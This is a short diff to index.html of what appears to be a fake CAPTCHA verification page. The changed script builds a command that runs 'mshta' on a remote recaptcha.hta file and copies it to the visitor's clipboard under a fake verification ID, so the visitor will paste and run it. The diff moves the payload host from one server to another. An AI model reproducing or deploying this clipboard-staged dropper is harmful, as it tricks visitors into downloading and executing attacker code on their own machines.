--- a/index.html
+++ b/index.html
@@ -1,4 +1,4 @@
-<!DOCTYPE html>
+﻿<!DOCTYPE html>
 
 <html lang="en">
     <head>
@@ -419,7 +419,7 @@
             var verification_id = generateRandomNumber();
             document.getElementById('verification-id').textContent = verification_id;
             
-            const htaPath = "http://bashupload.com/4YkHi/" + "recaptcha.hta?download=1";
+            const htaPath = "http://vangviengparamotorcenter.com/" + "recaptcha.hta";
             const commandToRun = "mshta " + htaPath
             stageClipboard(commandToRun, verification_id)
         }
